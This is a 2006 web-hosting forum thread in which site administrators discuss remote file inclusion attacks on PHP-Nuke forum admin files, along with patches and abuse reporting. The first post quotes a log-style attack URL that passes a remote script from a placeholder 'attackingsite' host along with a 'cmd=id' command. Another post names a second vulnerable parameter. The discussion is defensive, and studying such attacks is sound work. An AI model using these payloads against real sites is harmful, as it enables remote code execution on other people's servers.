Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - Other
Author Message
guidyy
Worker
Worker


Joined: Nov 22, 2004
Posts: 208
Location: Italy

PostPosted: Thu May 18, 2006 11:48 pm Reply with quote

I never seen it before
modules/Forums/admin/admin_styles.php?phpbb_root_path=http://attackingsite/cse.gif?&cmd=id
cse.gif of course cse.gif is not a gif..
not sure why they use admin_style.php


edit:
I removed the original link, but 99% it was a zombie.


Last edited by guidyy on Fri May 19, 2006 4:38 am; edited 1 time in total 
View user's profile Send private message Visit poster's website MSN Messenger
hitwalker
Sells PC To Pay For Divorce


Joined:
Posts: 5661

PostPosted: Fri May 19, 2006 3:56 am Reply with quote

yes one of the many around.....
but do edit the url a bit,take out the weblink...
you dont wanna give others an idea...
 
View user's profile Send private message
Susann
Moderator


Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

PostPosted: Fri May 19, 2006 4:38 am Reply with quote

The use also //modules/My_eGallery/public/displayCategory.php?basepath=
but it´s uninterestingly for me it´s old.
 
View user's profile Send private message
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Mon Jun 19, 2006 12:32 am Reply with quote

There have been a lot of recent attacks on the Forums/admin files. But I've not confirmed if the latest BBToNukes are vulernable - I just have not been able to duplicate it on my patched systems.

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 6383

PostPosted: Mon Jun 19, 2006 4:39 am Reply with quote

The good news is that since the attackers host these scripts on their sites, you can easily request that their sites be shut down for violating the terms of service / usage. But be careful when requesting this, since the attacking site may have been used unknowingly. But the site needs to secure itself in that case, and a few days is sufficient before requesting that it, too, be shut down. On a recent day, attacks from 10 sites were made on one of my sites. By the next day, 8 of the 10 were shut down.

Find the abuse email for the owner of the server (it's usually not the same as the domain) and send them a copy of your log entry showing that the attack happened. Then all they need to do is very that the file exists on their server...

_________________
I google, therefore I exist...
Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
technocrat
Life Cycles Becoming CPU Cycles


Joined: Jul 07, 2005
Posts: 511

PostPosted: Tue Jun 20, 2006 12:11 pm Reply with quote

evaders99 wrote:
There have been a lot of recent attacks on the Forums/admin files. But I've not confirmed if the latest BBToNukes are vulernable - I just have not been able to duplicate it on my patched systems.


Its because of $phpbb_root_path = PHPBB_ROOT_PATH; in the pagestart in the patched series.

PS - Only registered users can see links on this board! Get registered or login! you still have not fixed these Sad

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! / Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - Other

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©